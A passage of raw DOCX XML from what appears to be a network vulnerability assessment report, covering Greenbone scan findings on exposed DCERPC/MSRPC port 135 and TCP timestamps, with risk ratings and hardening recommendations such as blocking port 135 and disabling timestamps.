    <w:p w14:paraId="2DFB74E8" w14:textId="24E0EAE3" w:rsidR="00D55CFD" w:rsidRDefault="008B1354" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008B1354">
        <w:t>Restrict SMB to trusted networks only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F0E8EE" w14:textId="77777777" w:rsidR="008B2D94" w:rsidRDefault="008B2D94" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC55741" w14:textId="77777777" w:rsidR="003A55F2" w:rsidRDefault="003A55F2" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728FBF5D" w14:textId="77777777" w:rsidR="003A55F2" w:rsidRDefault="003A55F2" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064D118F" w14:textId="77777777" w:rsidR="003A55F2" w:rsidRDefault="003A55F2" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC619C8" w14:textId="77777777" w:rsidR="003A55F2" w:rsidRDefault="003A55F2" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509A6134" w14:textId="77777777" w:rsidR="003A55F2" w:rsidRDefault="003A55F2" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B6AA64" w14:textId="77777777" w:rsidR="003A55F2" w:rsidRDefault="003A55F2" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46396031" w14:textId="4D8FE7A6" w:rsidR="00271D54" w:rsidRPr="00371818" w:rsidRDefault="00371818" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00271D54" w:rsidRPr="00371818">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="008B2D94" w:rsidRPr="00371818">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DCERPC and MSRPC Services Enumeration Reporting</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271D54" w:rsidRPr="00271D54" w14:paraId="1276722E" w14:textId="77777777">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A61C00"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="222C2439" w14:textId="21AE7825" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="009E452C" w:rsidP="000B2F08">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B2F08">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
            <w:r w:rsidR="00271D54" w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> RISK (</w:t>
            </w:r>
            <w:r w:rsidR="00074F45" w:rsidRPr="000B2F08">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>5.0</w:t>
            </w:r>
            <w:r w:rsidR="00271D54" w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00271D54" w:rsidRPr="00271D54" w14:paraId="13B8551A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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5070F86" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Exploitation Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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5AEB6617" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00271D54" w:rsidRPr="00271D54" w14:paraId="0E2EC0CB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="301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1A58AA2" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66C42791" w14:textId="74DC03C9" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="003B1E38" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B1E38">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00271D54" w:rsidRPr="00271D54" w14:paraId="64936CA0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="301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2A6DA6D" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345"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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="461667A8" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06BB12BD" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51CAA39E" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00271D54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synopsis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EA1AED" w14:textId="3EC52C31" w:rsidR="00271D54" w:rsidRDefault="00865CF2" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00865CF2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DCERPC/MSRPC services on port 135 are exposed, allowing attackers to enumerate service details and domain information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09482370" w14:textId="77777777" w:rsidR="003A55F2" w:rsidRPr="00271D54" w:rsidRDefault="003A55F2" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A17D900" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00271D54">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D52D5" w14:textId="77777777" w:rsidR="00DA59E2" w:rsidRDefault="00DA59E2" w:rsidP="00DA59E2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA59E2">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>The Greenbone scan flagged “DCERPC and MSRPC Services Enumeration Reporting” with a CVSS score of 5.0. Nmap confirmed port 135/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA59E2">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA59E2">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> is open running Microsoft Windows RPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C99C41C" w14:textId="33602F4B" w:rsidR="00DA59E2" w:rsidRPr="00DA59E2" w:rsidRDefault="00DA59E2" w:rsidP="00DA59E2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA59E2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DCDF824" wp14:editId="69949E62">
            <wp:extent cx="5621572" cy="3834801"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1556010617"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10617" name="Picture 38"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25027" cy="3837158"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FF796B" w14:textId="60F6EA2C" w:rsidR="00DA59E2" w:rsidRPr="00DA59E2" w:rsidRDefault="00DA59E2" w:rsidP="00DA59E2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00292DB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002870F8" w:rsidRPr="00292DB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00292DB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA59E2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Greenbone detection of DCERPC/MSRPC enumeration vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8550F1" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00271D54">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SUGGESTED REMEDIATION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704AAB08" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00271D54">
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0146AD90" w14:textId="22C0AFC0" w:rsidR="00466DF6" w:rsidRDefault="00466DF6" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Block port 135/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from untrusted networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF7AFE" w14:textId="28D12BC1" w:rsidR="00466DF6" w:rsidRDefault="00466DF6" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Limit RPC exposure to administrative jump hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24125A52" w14:textId="42AE3B40" w:rsidR="00466DF6" w:rsidRDefault="00466DF6" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Apply Microsoft hardening guidelines for RPC services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D128EAF" w14:textId="77777777" w:rsidR="00C25B8B" w:rsidRPr="00271D54" w:rsidRDefault="00C25B8B" w:rsidP="00C25B8B">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310CB3BF" w14:textId="0663F3EF" w:rsidR="00271D54" w:rsidRPr="00DC59D8" w:rsidRDefault="00271D54" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC59D8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - </w:t>
      </w:r>
      <w:r w:rsidR="003A7623" w:rsidRPr="00DC59D8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TCP Timestamps</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271D54" w:rsidRPr="00271D54" w14:paraId="0EE61DA5" w14:textId="77777777">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A61C00"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F5870A4" w14:textId="1B2D26CE" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="009E452C" w:rsidP="000B2F08">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B2F08">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
            <w:r w:rsidR="00271D54" w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> RISK (</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2F08">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>2.6</w:t>
            </w:r>
            <w:r w:rsidR="00271D54" w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00271D54" w:rsidRPr="00271D54" w14:paraId="34BD574D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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D0C0328" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Exploitation Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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40E1E28F" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00271D54" w:rsidRPr="00271D54" w14:paraId="16081829" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="301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ECAE629" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28EC8DC9" w14:textId="1880A9FB" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="004E58D1" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00271D54" w:rsidRPr="00271D54" w14:paraId="285E9F5A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="301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F93A2F4" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345"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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DDF3E1C" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00271D54">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5113F7D1" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0616E8A4" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00271D54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synopsis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5258E7" w14:textId="77777777" w:rsidR="00786CED" w:rsidRDefault="00221717" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00221717">
        <w:t>The system responds to TCP timestamp requests, which may assist attackers in fingerprinting system uptime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE8B280" w14:textId="207E0353" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00271D54">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AC3984" w14:textId="77777777" w:rsidR="004D507D" w:rsidRDefault="004D507D" w:rsidP="004D507D">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D507D">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>The Greenbone scan identified “TCP Timestamps” with a CVSS score of 2.6. This weakness can be used for reconnaissance and timing attacks but does not directly compromise the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F213DA6" w14:textId="7946CC4A" w:rsidR="00443A49" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00271D54">
        <w:t xml:space="preserve">SUGGESTED REMEDIATION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A3F9C8" w14:textId="77777777" w:rsidR="00271D54" w:rsidRPr="00271D54" w:rsidRDefault="00271D54" w:rsidP="00271D54">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00271D54">
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAAD94D" w14:textId="5A35C62B" w:rsidR="00C407A8" w:rsidRDefault="00C407A8" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Disable TCP timestamps at the OS level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC9EB96" w14:textId="6CF0FE9B" w:rsidR="005926CF" w:rsidRDefault="00C407A8" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Apply system hardening guidelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E8E45" w14:textId="77777777" w:rsidR="00BD36F8" w:rsidRDefault="00BD36F8" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
